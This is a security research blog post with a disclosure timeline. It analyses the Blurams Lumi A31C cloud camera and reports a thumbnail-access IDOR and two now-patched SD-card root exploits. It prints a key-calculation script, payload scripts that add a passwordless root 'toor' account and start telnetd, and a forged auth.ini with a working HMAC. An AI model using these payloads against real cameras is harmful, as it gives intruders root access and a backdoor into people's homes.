





Continuing the series of analysing cloud-enabled devices (see BASETech IP camera and Meross Garage Door Opener for previous research), we have taken a look at the Blurams Lumi Security Camera (A31C). This research and blog post were created in collaboration with my coworker Arne. This particular device is marketed as a 2-way camera: someone can press a button on the camera to establish live communication with the owner (e.g. for helping children or the elderly). The video and the controls are accessed through a mobile application as well as a web client, so the video stream can be viewed and the device controlled from anywhere in the world. A second device without the 2-way feature was also purchased (A31).

This is a rather long blog post. If you are only interested in the vulnerabilities, you can skip right to the Vulnerabilities chapter. The vulnerabilities were closed by Blurams before the publication of this post.

Recon



To get the device working we first needed to install the “blurams” mobile application and register an account. For the purpose of this analysis a main account was created to which the camera was paired. Other accounts without any paired device were also created.



After that, while logged in to the mobile application with the primary account, the WiFi credentials are entered and the app generates a QR code. The camera then scans this code and joins the WiFi.











Interestingly, this QR code appears to be encrypted. The content of this code is this (hexdump view):





















This QR code might also contain the account ID of the user, since the mobile application does not appear to communicate directly with the camera. The camera connects to the WiFi, obtains an IP address through DHCP and immediately connects to the Blurams cloud infrastructure, encrypting all communication. Following is a capture of the initial Wireshark dump during and after the setup of the device.







Once the device is connected to the network, the first step is to enumerate any open ports. This device, however, exposes none.

All further communication with the device is routed through the cloud infrastructure of Blurams. The device uses STUN to allow communication of the mobile application with it. Even if such a device is deployed behind a firewall which blocks all access, STUN makes it possible to remotely access it.







Investigating the web client











There is a web client available through https://client.blurams.com/ which can be used to stream the video and control the device. This client is particularly interesting since it is trivial to intercept its traffic via Burp Suite.

The camera paired to our primary account already appears in it. The video can be viewed live, and if cloud storage is enabled (by default it is not), the stored video can be viewed as well.









Most of the communication uses REST style endpoints, for example here a list of all paired devices is loaded by the web client:

Included in this response is the device ID of our camera: xxxxS_a0ff22435471

xxxxS_ appears to be a static prefix and a0ff22435471 is simply the MAC address of the device.
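The relationship between MAC address and device ID can be sketched in a few lines of Python. This is only an illustration: `device_id_from_mac` is a hypothetical helper name, and the prefix is the redacted `xxxxS_` placeholder from this post, not the real value.

```python
import re

# Redacted placeholder from the post; the real static prefix is not shown.
DEVICE_ID_PREFIX = "xxxxS_"


def device_id_from_mac(mac: str, prefix: str = DEVICE_ID_PREFIX) -> str:
    """Build a device ID from a MAC written with ':', '-' or no separators."""
    # Keep only the hex digits and normalise to lowercase, as seen in the API.
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac).lower()
    if len(digits) != 12:
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return prefix + digits
```

For example, `device_id_from_mac("A0:FF:22:43:54:71")` yields the ID seen in the response above.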





Once a live view of the stream is started, a WebSocket connection is initiated like this:



Through the WebSocket connection the client then sends the following request:

The payload of the request is Base64 encoded, but in a strange way. The first 10 characters are encoded separately and in this case decode to 1424276. The remainder is a single encoded block of JSON data which has been cut in the middle with its two halves swapped, resulting in this:

":"720p","deviceName":"","clientId":"WEBCLIENT_H5_80424545391278391689940921836",

"shareId":"","relayServer":"10.150.2.147:50921","isSDCardPlayback":"false",

"preConnect":"false","releaseVersion":"","isSupportWASM":"1"}{"requestTime":

"1689940921836","productKey":"1cad3c83-d87","deviceId":"xxxxS_a0ff22435471",

"channelNo":"","token":"a4ef7ff88eb845fe99826d78922a3a8e","hasAudio":"true",

"region":"","isPermanentStorage":"false","channel

Changing the token in this request to the token of another user did not allow that user to view the video stream, so the backend handled this correctly. Requesting cloud-stored videos worked in a similar way. Although this is not done via WebSocket, the same _paramStr_ format is used to retrieve that data, and the token is checked correctly in that instance as well.
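The _paramStr_ encoding described above can be undone with a short Python sketch. It rests on assumptions drawn only from the one sample shown here: the 10-character prefix is Base64 with its padding stripped, the remainder is ordinary Base64, and the seam between the swapped halves is the only place where `}` is directly followed by `{`. The function names are hypothetical.

```python
import base64
import json


def _b64decode_unpadded(text: str) -> bytes:
    """Decode Base64 whose trailing '=' padding may have been stripped."""
    return base64.b64decode(text + "=" * (-len(text) % 4))


def decode_param_str(param_str: str) -> tuple[str, dict]:
    """Return the decoded 10-character prefix and the restored JSON body."""
    prefix = _b64decode_unpadded(param_str[:10]).decode("ascii")
    rotated = _b64decode_unpadded(param_str[10:]).decode("utf-8")
    # The decoded text looks like '<second half>}{<first half>'.
    # Assumption: the JSON is flat, so '}{' occurs only at the seam.
    seam = rotated.index("}{") + 1
    return prefix, json.loads(rotated[seam:] + rotated[:seam])
```

Looking for the `}{` seam instead of splitting at the exact midpoint avoids having to know how the client rounds an odd-length string.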











Looking back at the initial view of the devices paired with the account it can be identified that the preview image is not retrieved in the same way. For example, the preview is fetched like this:

The URL parameters after the token can be ignored as they appear to be without any function. Simply accessing the following URL would load the preview image: https://vrs-pho-oci.blurams.com/lookup/thumbnail/xxxxS_a0ff22435471/current?token=a4ef7ff88eb845fe99826d78922a3a8e

The URL effectively contains two parameters: the device ID and the user's access token. To verify whether permissions are checked here, the token was replaced with the token of a secondary user which did not have any device paired. Surprisingly, the preview image could still be retrieved:



The camera appears to upload a preview image roughly every 13 seconds at a low resolution of 640×360. Since the device ID consists only of the MAC address, it is trivial to enumerate other IDs and gain access to their (almost) live preview images. For this, the camera only needs to be paired to an account and be able to reach the cloud servers. Even if it is installed behind a firewall and incoming connections to it are blocked, as long as it can upload the images, they can be accessed by anyone.

Using this, it is possible to get a semi-live low quality video stream of all currently online cameras.
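To illustrate why MAC-based IDs are so easy to enumerate, the following Python sketch builds the thumbnail URL for a device ID and lists the IDs that follow a known MAC address. It performs no network requests. The helper names are hypothetical, the prefix is the redacted placeholder from this post, and the endpoint no longer accepts foreign tokens since the fix.

```python
from typing import Iterator
from urllib.parse import quote, urlencode

THUMBNAIL_BASE = "https://vrs-pho-oci.blurams.com/lookup/thumbnail"


def thumbnail_url(device_id: str, token: str) -> str:
    """Build the preview URL from its two effective parameters."""
    query = urlencode({"token": token})
    return f"{THUMBNAIL_BASE}/{quote(device_id, safe='')}/current?{query}"


def neighbouring_device_ids(
    mac_hex: str, count: int, prefix: str = "xxxxS_"
) -> Iterator[str]:
    """Yield `count` device IDs starting at the given 12-digit hex MAC."""
    start = int(mac_hex, 16)
    for value in range(start, start + count):
        # Mask to 48 bits and zero-pad so every ID keeps twelve hex digits.
        yield f"{prefix}{value & 0xFFFFFFFFFFFF:012x}"
```

Because vendors usually assign MAC addresses sequentially within their block, counting up from one known device is likely to hit other real devices.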









Curiously, there is also an endpoint which is used to get settings of the device, the request is done like this:



If the provided device ID is paired to the account, this request is performed instantly. However, when the account has no devices paired or if simply the device ID parameter is removed, then the request takes more than 10 seconds and returns the data of a single random device, for example:



Thankfully, as far as I can tell, this does not make it possible to correlate the device ID with the connected SSID, because the response does not include it. Having the SSID would make finding the physical location of the device much easier.



Getting shell access to the camera

To better understand what the camera does, access to its Linux operating system would be preferable.











Through the endpoint /api/device/checkMultiCameraV2 the address of a firmware image could be identified (e.g. https://fw.blurams.com/Device/1cad3c83-d87/A31C_AK_IPC/1/23.0406.435.4120/a31c_f1r03_LV230525.12237_ota.enc), however the image is encrypted.









Having no other means of connecting to the camera the hardware was the next step to be investigated.



While the board does contain UART pins it was not possible to transmit any data to it. From them only the U-Boot boot loader messages could be read but it wasn’t immediately possible to force single user mode.

Instead to gain initial access to the firmware the flash of the camera was desoldered and dumped.

This worked flawlessly and with that the binaries and configuration could be analyzed.

The file /opt/sh/safe_exec.sh caught our attention. This shell script is configured to be executed on startup by the following code block in /init.d/rcS:

echo "check factorytest..."

if [ -d /mnt/sdcard/factorytest ]; then

echo "start factorytest..."

cd /mnt/sdcard/factorytest

/opt/sh/safe_exec.sh ./auth.ini ./factorytest.sh

exit 0

fi

The script is as follows:

#########################################################

#

# auth.ini example:

#

# KEY=12345678901234567

# MD5SUM_FILE=test.md5sum

# MD5SUM_MD5=b757a9fc7aa080272c37902c701e2eb4

#

#########################################################

THISDIR=`dirname $0`

AUTH_FILE=$1

SCRIPT_FILE=$2

exit_with_msg()

{

echo "$2"

exit $1

}

check_auth()

{

[ x"$1" = x"" ] && return 0

[ -f "$1" ] || return 0

${THISDIR}/../bin/ukey -t "$1" > /dev/null 2>&1

}

check_emergy_key()

{

KEY=`grep "KEY=" "$1" | cut -d'=' -f2 | cut -d'e' -f2`

P1=`cut -d'.' -f1 /etc/version`

P2=`cut -d'.' -f2 /etc/version`

P3=`cut -d'.' -f3 /etc/version`

AUTH1=`expr ${P1} \* 600 + ${P2} \* 30 + ${P3} \* 9`

AUTH2=`expr ${AUTH1} \* ${AUTH1}`

test ${AUTH2} = ${KEY}

}

[ x"${AUTH_FILE}" = x"" ] && exit_with_msg 1 "no auth file"

[ x"${SCRIPT_FILE}" = x"" ] && exit_with_msg 1 "no scrip file"

check_emergy_key "${AUTH_FILE}" && {

echo "fast run ${SCRIPT_FILE} ..."

sh ${SCRIPT_FILE}

exit 0

}

check_auth "${AUTH_FILE}" || exit_with_msg 2 "auth file has been changed!"

source "${AUTH_FILE}"

[ x"${MD5SUM_FILE}" = x"" ] && exit_with_msg 3 "no md5sum file"

# get script md5sum

SCRIPT_MD5SUM=`md5sum "${SCRIPT_FILE}" | cut -d' ' -f1`

echo "SCRIPT_MD5SUM=${SCRIPT_MD5SUM}"

# check md5sum of script and other files

AUTH_DIR=`dirname ${AUTH_FILE}`

cd ${AUTH_DIR}

MD5SUM_MD5SUM=`md5sum "${MD5SUM_FILE}" | cut -d' ' -f1`

[ x"${MD5SUM_MD5}" = x"${MD5SUM_MD5SUM}" ] || exit_with_msg 4 "md5sum file has been changed!"

SCRIPT_MD5_COUNT=`grep "${SCRIPT_MD5SUM}" "${MD5SUM_FILE}" | wc -l`

[ x"${SCRIPT_MD5_COUNT}" = x"1" ] || exit_with_msg 5 "script has been changed!"

md5sum -c "${MD5SUM_FILE}" || exit_with_msg 6 "check md5sum failed!"

cd -

echo "check auth ok!"

echo "run ${SCRIPT_FILE} ..." > /dev/null

sh ${SCRIPT_FILE}



The interesting part of this script is the check_emergy_key() function. If this function returns true, the shell script passed as $2 is executed right away (the "fast run" branch), skipping all further checks. check_emergy_key() really only takes the first three version components from /etc/version and does some arithmetic on them. The version of our camera can easily be identified, since the endpoint /api/device/checkMultiCameraV2 provides this information.

We can do the same calculations quickly with this shell script:

#!/bin/sh

VERSION='23.0406.435.4120'

P1=`echo $VERSION | cut -d'.' -f1`

P2=`echo $VERSION | cut -d'.' -f2`

P3=`echo $VERSION | cut -d'.' -f3`

AUTH1=`expr ${P1} \* 600 + ${P2} \* 30 + ${P3} \* 9`

AUTH2=`expr ${AUTH1} \* ${AUTH1}`

echo $AUTH2

With the version configured above, this generates the “key” 893711025. Armed with that information, the folder /factorytest is created on an otherwise empty FAT32-formatted SD card. In it, the following auth.ini file is placed:

KEY=893711025

And the following factorytest.sh file:

#!/bin/sh

echo 'toor:x:0:0:root:/:/bin/sh' >> /etc/passwd

echo 'toor::15874:0:99999:7:::' >> /etc/shadow

telnetd &
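The key derivation and the resulting auth.ini can also be reproduced off-device. The following Python sketch mirrors the arithmetic of check_emergy_key(). The function names are hypothetical, and it assumes /etc/version holds the same dotted version string that the API reports.

```python
def emergency_key(version: str) -> int:
    """Mirror check_emergy_key(): combine the first three version parts, then square."""
    # int() reads "0406" as decimal 406, matching what expr does on the device.
    p1, p2, p3 = (int(part) for part in version.split(".")[:3])
    auth1 = p1 * 600 + p2 * 30 + p3 * 9
    return auth1 * auth1


def auth_ini(version: str) -> str:
    """Content of an auth.ini that passes the emergency key check."""
    return f"KEY={emergency_key(version)}\n"
```

For 23.0406.435.4120 the intermediate value is 23·600 + 406·30 + 435·9 = 29895, and 29895² = 893711025, which matches the key used above.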



















The supplied shell script creates a secondary root account named toor without a password and starts telnetd. Putting that SD card into the camera and rebooting it gives us our root shell via telnet:







Using this access it was then possible to also decrypt the initially identified firmware update file via the main binary of the camera.

Of course, for our research this data is no longer necessary, since shell access gives us access to it anyway.

Getting shell access to the camera on version 2.3.38.12558

After we disclosed the SD card vulnerability to Blurams, they rolled out a new version and asked if we could take a look at the fix as well. Curious as to how it was solved, we started to investigate again. Using the API, the URL of the firmware could be retrieved again (https://fw.blurams.com/Device/1cad3c83-d87/A31C_AK_IPC/2/2.3.38.12558/a31c_f1r03_LV231215.12558_ota.enc). This was again an encrypted file.

Since we still had access to the device, we could decrypt this file on the camera. After decrypting and unpacking the files, we can see the new safe_exec.sh script:

#########################################################

#

# auth.ini example:

#

# KEY=12345678901234567

# MD5SUM_FILE=test.md5sum

# MD5SUM_MD5=b757a9fc7aa080272c37902c701e2eb4

#

#########################################################

THISDIR=`dirname $0`

AUTH_FILE=$1

SCRIPT_FILE=$2

exit_with_msg()

{

echo "$2"

exit $1

}

check_auth()

{

[ x"$1" = x"" ] && return 1

[ -f "$1" ] || return 1

${THISDIR}/../bin/ukeyHmacRead -t "$1" > /dev/null 2>&1

}

# check_emergy_key()

# {

# KEY=`grep "KEY=" "$1" | cut -d'=' -f2 | cut -d'e' -f2`

# P1=`cut -d'.' -f1 /etc/version`

# P2=`cut -d'.' -f2 /etc/version`

# P3=`cut -d'.' -f3 /etc/version`

# AUTH1=`expr ${P1} \* 600 + ${P2} \* 30 + ${P3} \* 9`

# AUTH2=`expr ${AUTH1} \* ${AUTH1}`

# test ${AUTH2} = ${KEY}

# }

[ x"${AUTH_FILE}" = x"" ] && exit_with_msg 1 "no auth file"

[ x"${SCRIPT_FILE}" = x"" ] && exit_with_msg 1 "no scrip file"

# check_emergy_key "${AUTH_FILE}" && {

# echo "fast run ${SCRIPT_FILE} ..."

# sh ${SCRIPT_FILE}

# exit 0

# }

check_auth "${AUTH_FILE}" || exit_with_msg 2 "auth file has been changed!"

source "${AUTH_FILE}"

[ x"${MD5SUM_FILE}" = x"" ] && exit_with_msg 3 "no md5sum file"

[...]







We can see that the vulnerable check_emergy_key() function has been commented out, and a new binary was included in the firmware instead: ukeyHmacRead

The auth.ini file path is passed as a parameter to ukeyHmacRead to perform some check. If this does not fail, then source "/mnt/sdcard/factorytest/auth.ini" is executed. Since source runs every line of the file as a shell command and we control the content of auth.ini, this gives us code execution. We only need to make sure that the ukeyHmacRead -t "/mnt/sdcard/factorytest/auth.ini" command does not fail.

We copied the new binary to the device and later emulated it using qemu to figure out what it does. It appears to calculate and check an HMAC inside the file. Analyzing the binary makes it clear that it now expects KHMAC inside the auth.ini file.

After we figured out that this value needs to be at the end of the file, and that the file needs to contain at least a certain amount of data, the tool itself could also be used to calculate the value for our own file.
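The general idea of such a check can be sketched in Python. This is not the algorithm of ukeyHmacRead, which is not documented in this post. It is a guess under stated assumptions: HMAC-SHA256 (merely consistent with a 64-character hex value), computed over everything that precedes the KHMAC line, with a placeholder key standing in for the static key embedded in the binary.

```python
import hashlib
import hmac

# Hypothetical placeholder; the real key is embedded in ukeyHmacRead.
PLACEHOLDER_KEY = b"not-the-real-key"


def sign_auth_ini(body: str, key: bytes = PLACEHOLDER_KEY) -> str:
    """Append a KHMAC line covering everything before it (assumed layout)."""
    if not body.endswith("\n"):
        body += "\n"
    digest = hmac.new(key, body.encode("utf-8"), hashlib.sha256).hexdigest()
    return f"{body}KHMAC={digest}\n"


def verify_auth_ini(content: str, key: bytes = PLACEHOLDER_KEY) -> bool:
    """Recompute the HMAC over the text before the last 'KHMAC=' and compare."""
    body, sep, tail = content.rpartition("KHMAC=")
    if not sep:
        return False
    expected = hmac.new(key, body.encode("utf-8"), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tail.strip())
```

Whatever the exact construction, a static key shared by all devices means that anyone who extracts it once, or who can run the binary as a signing oracle, can produce valid files for every device on that firmware.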

Using this, a new auth.ini file can be created to exploit the new firmware to gain a root shell on the device. On an SD card the file /factorytest/exploit.sh is placed with the following content:

#!/bin/sh

echo 'toor:x:0:0:root:/:/bin/sh' >> /etc/passwd

echo 'toor::15874:0:99999:7:::' >> /etc/shadow

telnetd &

And the file /factorytest/auth.ini is placed on it with this content:

KEY=12345

/mnt/sdcard/factorytest/exploit.sh

KHMAC=6213ddd1e497593bfe4f2cb25af5e47eaaef69196d45c22678e06cbde54cff84

Armed with this knowledge, the device was updated to the latest firmware version. After that, the SD card was inserted and the device rebooted. A few seconds later the exploit executed and telnet was available again.

Having access to the device and being able to decrypt the firmware update file allowed us to gain access to the ukeyHmacRead binary very quickly. It should be noted that without this access, an attacker could again desolder and dump the flash memory to access the files. Using this shortcut just saved us a lot of time.

Vulnerabilities

This is the condensed list of vulnerabilities identified during this research in order of appearance. At the time of publishing this article, all of the vulnerabilities have been fixed.

1. Unauthorised access to camera feed thumbnails

The cameras upload a lower resolution thumbnail (usually 640×360) roughly every 13 seconds. These thumbnails can be accessed by providing any valid access token. It is not verified whether the access token belongs to an account paired with the camera. Creating an account to get a token is free and does not require the purchase of a camera.

The camera ID required to access cameras is based on the MAC address of the device and can therefore be trivially enumerated.

With that, it was possible for anyone to access the thumbnail image of any camera that was currently online.

2. Code execution through SD card (CVE-2023-50488)

By abusing a factory test script on the device, it is possible to execute any command on the device as the root user.

The key which should protect this function is based only on the software version string of the device. These version strings are generally publicly known. The key can therefore be calculated, and the factory test function can be abused to get code execution on the device.

Placing two files on an SD card, inserting this SD card into the device and rebooting the device will execute an attacker-provided shell script with root privileges on it (see examples on GitHub). This potentially affects all devices up to and including firmware version 23.0406.435.4120.

3. Code execution through SD card (CVE-2023-51820)

Again by abusing a factory test script on the device, it is possible to execute any command on the device as the root user.

The key is no longer calculated from the version string but is now a static key inside a binary. Once the key has been obtained, a file can be forged that allows code execution on all devices running this firmware version.

Placing two files on an SD card, inserting this SD card into the device and rebooting the device will execute an attacker-provided shell script with root privileges on it (see examples on GitHub). This only affects devices with firmware version 2.3.38.12558 installed.

Conclusion

Due to time constraints, this is as far as our investigation goes. Ultimately we were unable to access the HD video stream. Access was only possible to the semi-live preview images of the video streams.

Overall we were surprised by the sophistication of the device, which is relatively cheap. Communication is for the most part encrypted, no services are exposed via the network, an update mechanism appears to exist, and it was not trivially possible to boot into single user mode using UART.

We hope that this groundwork enables other researchers to further investigate the devices. We haven’t even started to look at the mobile apps or the main camera binary.

Working with Blurams, once a communication channel was established, has been great. They were interested in fixing the reported vulnerabilities, asked us to check their remediations and took our recommendations.

Disclosure timeline









2023-11-03: Vulnerabilities initially identified, first attempt to contact Blurams (via email)

2023-11-14: Second attempt to contact Blurams (via email)

2023-11-23: Third attempt to contact Blurams (on Twitter)

2023-12-04: Another attempt to contact Blurams (via email and Twitter)

2023-12-07: Blurams acknowledges the vulnerabilities

2023-12-16: Blurams lets us know that the issues are fixed and asks if we can verify

2023-12-18: We verify that the thumbnails can no longer be accessed but point out a new problem with the SD card remediation

2023-12-29: Blurams acknowledges again and asks us to verify a new implemented fix

2024-01-02: We verify that the SD card vulnerability is now also fixed

2024-02-01: Public disclosure